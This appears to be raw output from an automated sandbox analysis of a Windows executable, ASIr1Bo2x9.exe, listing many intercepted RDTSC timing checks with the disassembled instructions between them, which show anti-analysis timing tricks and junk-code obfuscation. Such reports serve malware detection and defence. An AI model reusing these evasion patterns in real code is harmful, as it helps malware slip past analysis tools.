    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B5B7A second address: 10B5B84 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F30F50FDE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B5B84 second address: 10B5BA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3449h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B5CD2 second address: 10B5CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B5CD6 second address: 10B5CF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF343Ch 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F30F4CF343Ah 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B5CF2 second address: 10B5D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jg 00007F30F50FDE26h 0x0000000d jmp 00007F30F50FDE37h 0x00000012 popad 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B919A second address: 10B919E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B9765 second address: 10B9774 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10809EA second address: 10809EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C3F6E second address: 10C3F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F30F50FDE32h 0x00000009 jmp 00007F30F50FDE30h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C44D1 second address: 10C44D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C44D7 second address: 10C44DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C44DD second address: 10C44EC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F30F4CF343Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C4661 second address: 10C4671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 jp 00007F30F50FDE26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C4671 second address: 10C4690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F30F4CF3446h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C4690 second address: 10C4694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C4694 second address: 10C469A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C5CCA second address: 10C5CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C5D3F second address: 10C5DD6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F30F4CF3436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 6B7255CCh 0x00000012 sub dword ptr [ebp+122D307Dh], edi 0x00000018 call 00007F30F4CF3439h 0x0000001d jmp 00007F30F4CF343Eh 0x00000022 push eax 0x00000023 pushad 0x00000024 pushad 0x00000025 push edi 0x00000026 pop edi 0x00000027 jmp 00007F30F4CF343Eh 0x0000002c popad 0x0000002d jng 00007F30F4CF344Fh 0x00000033 popad 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 pushad 0x00000039 push esi 0x0000003a pushad 0x0000003b popad 0x0000003c pop esi 0x0000003d ja 00007F30F4CF3438h 0x00000043 popad 0x00000044 mov eax, dword ptr [eax] 0x00000046 jmp 00007F30F4CF3440h 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 push edx 0x00000053 pop edx 0x00000054 ja 00007F30F4CF3436h 0x0000005a popad 0x0000005b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C5F14 second address: 10C5F1E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F30F50FDE2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C60B5 second address: 10C60B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C60B9 second address: 10C60C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C60C6 second address: 10C60CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C60CC second address: 10C60D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C61E2 second address: 10C61E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C61E6 second address: 10C61F0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F30F50FDE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C61F0 second address: 10C6213 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F30F4CF3443h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F30F4CF3436h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C6471 second address: 10C6475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C69C9 second address: 10C69CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C69CD second address: 10C69D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C6A4B second address: 10C6A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C6A51 second address: 10C6A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C6A55 second address: 10C6A79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F30F4CF3444h 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ebx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C6D0B second address: 10C6D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F50FDE34h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C6E76 second address: 10C6E80 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F30F4CF3436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C6E80 second address: 10C6E85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C8FCA second address: 10C8FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C8FD1 second address: 10C9022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F30F50FDE28h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov di, 7B28h 0x0000002b push 00000000h 0x0000002d jmp 00007F30F50FDE2Ah 0x00000032 xchg eax, ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 js 00007F30F50FDE2Ch 0x0000003b js 00007F30F50FDE26h 0x00000041 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C9022 second address: 10C902C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F30F4CF3436h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C902C second address: 10C9043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F30F50FDE4Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F30F50FDE26h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C9B82 second address: 10C9B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CA6FA second address: 10CA7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F30F50FDE39h 0x0000000d jmp 00007F30F50FDE33h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F30F50FDE28h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d pushad 0x0000002e xor edx, 51B6D756h 0x00000034 mov edx, edi 0x00000036 popad 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F30F50FDE28h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 mov edi, dword ptr [ebp+124599D6h] 0x00000059 mov dword ptr [ebp+122D31BEh], ecx 0x0000005f push 00000000h 0x00000061 mov dword ptr [ebp+1244F2B6h], ecx 0x00000067 xchg eax, ebx 0x00000068 jmp 00007F30F50FDE39h 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 jns 00007F30F50FDE2Ch 0x00000076 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CA7A3 second address: 10CA7A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB1B9 second address: 10CB224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F30F50FDE26h 0x0000000a popad 0x0000000b pop edi 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F30F50FDE28h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 sub si, E065h 0x0000002e mov di, CACEh 0x00000032 mov esi, edi 0x00000034 push 00000000h 0x00000036 mov si, bx 0x00000039 push 00000000h 0x0000003b xchg eax, ebx 0x0000003c jmp 00007F30F50FDE39h 0x00000041 push eax 0x00000042 jl 00007F30F50FDE38h 0x00000048 push eax 0x00000049 push edx 0x0000004a jp 00007F30F50FDE26h 0x00000050 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB224 second address: 10CB228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CBB0F second address: 10CBB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CBB14 second address: 10CBB34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F30F4CF3436h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F30F4CF343Bh 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CBB34 second address: 10CBB3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F30F50FDE26h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CBB3E second address: 10CBBB8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F30F4CF3438h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 jc 00007F30F4CF3447h 0x00000029 jmp 00007F30F4CF3441h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F30F4CF3438h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov edi, 24E3030Ah 0x0000004f push 00000000h 0x00000051 push esi 0x00000052 jns 00007F30F4CF343Bh 0x00000058 pop edi 0x00000059 xchg eax, ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c push ecx 0x0000005d pushad 0x0000005e popad 0x0000005f pop ecx 0x00000060 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB8FC second address: 10CB900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB900 second address: 10CB904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB904 second address: 10CB90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB90A second address: 10CB910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB910 second address: 10CB914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CB914 second address: 10CB918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CC514 second address: 10CC573 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007F30F50FDE26h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jo 00007F30F50FDE2Ch 0x00000014 jns 00007F30F50FDE26h 0x0000001a pop eax 0x0000001b nop 0x0000001c jbe 00007F30F50FDE2Bh 0x00000022 mov esi, 6EBC6B72h 0x00000027 push 00000000h 0x00000029 js 00007F30F50FDE2Eh 0x0000002f jbe 00007F30F50FDE28h 0x00000035 push ebx 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F30F50FDE28h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 xor di, 6620h 0x00000058 xchg eax, ebx 0x00000059 pushad 0x0000005a push ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CC573 second address: 10CC57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CF568 second address: 10CF56E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CC2EE second address: 10CC2F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CF746 second address: 10CF74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CF74A second address: 10CF7EE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F30F4CF3436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F30F4CF3440h 0x00000010 nop 0x00000011 jl 00007F30F4CF343Ah 0x00000017 pushad 0x00000018 mov ebx, edx 0x0000001a popad 0x0000001b mov ebx, dword ptr [ebp+122D3C2Ch] 0x00000021 push dword ptr fs:[00000000h] 0x00000028 jmp 00007F30F4CF3444h 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F30F4CF3438h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e jmp 00007F30F4CF343Dh 0x00000053 mov eax, dword ptr [ebp+122D0241h] 0x00000059 mov dword ptr [ebp+1244E950h], edi 0x0000005f push FFFFFFFFh 0x00000061 jmp 00007F30F4CF343Eh 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 jnc 00007F30F4CF343Ch 0x0000006f rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D158D second address: 10D1591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D1591 second address: 10D1597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D1597 second address: 10D159C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D159C second address: 10D15E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movsx ebx, si 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F30F4CF3438h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D37B0h], esi 0x00000031 push 00000000h 0x00000033 or ebx, dword ptr [ebp+122D2EBCh] 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F30F4CF343Dh 0x00000041 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D57D0 second address: 10D57D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D488F second address: 10D4893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D57D4 second address: 10D5841 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b add dword ptr [ebp+1244EA5Ch], ebx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F30F50FDE28h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d xor edi, dword ptr [ebp+122D2C60h] 0x00000033 push 00000000h 0x00000035 mov bl, 41h 0x00000037 xchg eax, esi 0x00000038 jmp 00007F30F50FDE2Bh 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jno 00007F30F50FDE2Ch 0x00000046 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8ABE second address: 10D8AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8AC3 second address: 10D8AC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8AC9 second address: 10D8ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8ACD second address: 10D8AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8AD1 second address: 10D8B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F30F4CF3438h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jc 00007F30F4CF343Ch 0x00000029 mov dword ptr [ebp+1244F306h], ecx 0x0000002f push 00000000h 0x00000031 mov edi, dword ptr [ebp+122D2F74h] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F30F4CF3438h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 0000001Dh 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 or ebx, dword ptr [ebp+122D367Ch] 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push ebx 0x0000005e pop ebx 0x0000005f rdtsc
